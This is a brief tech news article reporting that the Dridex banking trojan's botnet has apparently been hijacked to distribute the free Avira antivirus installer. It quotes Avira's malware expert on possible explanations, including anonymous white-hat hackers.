Widely used by cyber criminals to introduce malware onto systems, the Dridex banking trojan has been subject to a number of high profile investigations, and a takedown by US authorities last year.
These things don't stay dead for long, however, and Dridex is back in business. But in an interesting new twist it seems that the Dridex botnet has been hijacked to deliver the free Avira antivirus program rather than its more usual malicious payload.
Dridex is spread by spam, usually using a Word document with malicious macros. Once the file has been opened, the macros download the payload from a remote server, and the computer is infected. In the latest version though the links have been modified to deliver Avira instead.
"The content behind the malware download URL has been replaced, it's now providing an original, up-to-date Avira web installer instead of the usual Dridex loader," says Moritz Kroll, malware expert at Avira.
The company denies that it's behind the modification itself. "We still don't know exactly who is doing this with our installer and why -- but we have some theories," says Kroll. "This is certainly not something we are doing ourselves".
Explanations as to why this is happening include that it's an attempt to confuse detection processes. It could also be the work of white hat hackers who want their identities to remain secret. "While what they are doing is fundamentally helpful, it is also technically illegal in most countries, so they probably don't want to be known or identifiable," adds Kroll.
You can find out more about this unusual development on the Avira blog.
Image Credit: Julien Tromeur/ Shutterstock